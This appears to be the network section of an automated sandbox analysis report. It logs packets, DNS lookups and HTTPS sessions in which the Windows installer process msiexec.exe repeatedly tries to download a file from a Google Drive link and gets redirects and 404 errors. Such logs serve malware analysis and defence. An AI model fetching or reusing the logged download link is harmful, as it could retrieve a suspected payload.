Jan 10, 2025 15:45:48.786362886 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.786379099 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:48.786422968 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:48.786427021 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.786441088 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.786463022 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:48.786484003 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:48.790935040 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:48.790950060 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.923337936 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:48.923386097 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:48.923480034 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:48.923748016 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:48.923765898 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:49.568674088 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:49.568753004 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:49.569499016 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:49.569551945 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:49.571118116 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:49.571129084 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:49.571392059 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:49.571461916 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:49.571779013 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:49.615329027 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:49.969175100 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:49.969275951 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:49.969291925 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:49.969336987 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:49.969474077 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:49.969517946 CET	443	57095	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:49.969652891 CET	57095	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:49.985686064 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:49.985719919 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:49.985857964 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:49.986215115 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:49.986229897 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:50.650070906 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:50.650240898 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:50.650861979 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:50.650870085 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:50.650981903 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:50.650988102 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:51.075505018 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:51.075612068 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:51.075612068 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:51.075664997 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:51.075678110 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:51.075707912 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:51.075714111 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:51.075725079 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:51.075759888 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:51.076364040 CET	57096	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:51.076383114 CET	443	57096	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:51.192073107 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:51.192120075 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:51.192210913 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:51.197251081 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:51.197261095 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:51.845412970 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:51.845520020 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:51.846111059 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:51.846206903 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:51.847814083 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:51.847817898 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:51.848011971 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:51.848071098 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:51.848427057 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:51.891330957 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:52.228964090 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:52.229027033 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:52.229042053 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:52.229082108 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:52.229219913 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:52.229257107 CET	443	57097	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:52.229305983 CET	57097	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:52.245500088 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:52.245538950 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:52.245666027 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:52.245820999 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:52.245830059 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:52.908328056 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:52.908545017 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:52.909575939 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:52.909590960 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:52.909748077 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:52.909760952 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:53.345009089 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:53.345096111 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:53.345145941 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:53.345158100 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:53.345170021 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:53.345181942 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:53.345206976 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:53.345241070 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:53.345927000 CET	57098	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:53.345941067 CET	443	57098	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:53.469748974 CET	57099	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:53.469814062 CET	443	57099	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:53.469904900 CET	57099	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:53.470206022 CET	57099	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:53.470217943 CET	443	57099	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:54.112696886 CET	443	57099	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:54.112766981 CET	57099	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:54.113476038 CET	443	57099	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:54.113529921 CET	57099	443	192.168.2.6	142.250.184.238

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 15:44:31.569056034 CET	53	51925	162.159.36.2	192.168.2.6
Jan 10, 2025 15:44:32.122231960 CET	53	60229	1.1.1.1	192.168.2.6
Jan 10, 2025 15:45:06.413943052 CET	64201	53	192.168.2.6	1.1.1.1
Jan 10, 2025 15:45:06.420948982 CET	53	64201	1.1.1.1	192.168.2.6
Jan 10, 2025 15:45:07.520389080 CET	53562	53	192.168.2.6	1.1.1.1
Jan 10, 2025 15:45:07.527578115 CET	53	53562	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 15:45:06.413943052 CET	192.168.2.6	1.1.1.1	0x5d10	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:45:07.520389080 CET	192.168.2.6	1.1.1.1	0x20c7	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 15:45:06.420948982 CET	1.1.1.1	192.168.2.6	0x5d10	No error (0)	drive.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jan 10, 2025 15:45:07.527578115 CET	1.1.1.1	192.168.2.6	0x20c7	No error (0)	drive.usercontent.google.com		142.250.185.65	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	57058	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:07 UTC	216	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 14:45:07 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:07 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-eedX8Czp4bCxHS5FmvAYCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	57059	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:08 UTC	258	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 14:45:08 UTC	2229	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRItJsbaVhjt_cH3whBghLTj1BzoV4Rbw20kvhP1NRs8uDPh1jZ5BjDnTnr9rVpLZrU2v7uFTg Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:08 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-TdPoMTmsTn2hnyQZsCQJ1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ; expires=Sat, 12-Jul-2025 14:45:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:08 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 6b 53 42 45 6a 74 59 59 79 44 33 62 6e 4e 55 71 46 53 42 56 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vkSBEjtYYyD3bnNUqFSBVA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	57060	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:09 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:09 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:09 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Bj0dallgW19l37lskx5YPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	57061	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:10 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:10 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ3Ge0rWQ4OIGcTWeR2SNaabGuv1uQ48BAjgRLWePPwmNEnIUSzDJSp6HJQ7MnoVaYH Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:10 GMT Content-Security-Policy: script-src 'nonce-AEjyUSC5TCe81czzXPjESQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-10 14:45:10 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 5f 47 65 6a 4b 30 32 7a 58 47 65 31 39 6c 53 6c 53 4d 4d 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P_GejK02zXGe19lSlSMMZw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	57062	142.250.184.238	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:11 UTC	421	OUT	GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
2025-01-10 14:45:12 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 14:45:11 GMT Location: https://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-VaH0g3sGPyEGw6V-4s9yMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	57063	142.250.185.65	443	3608	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:45:12 UTC	463	OUT	GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
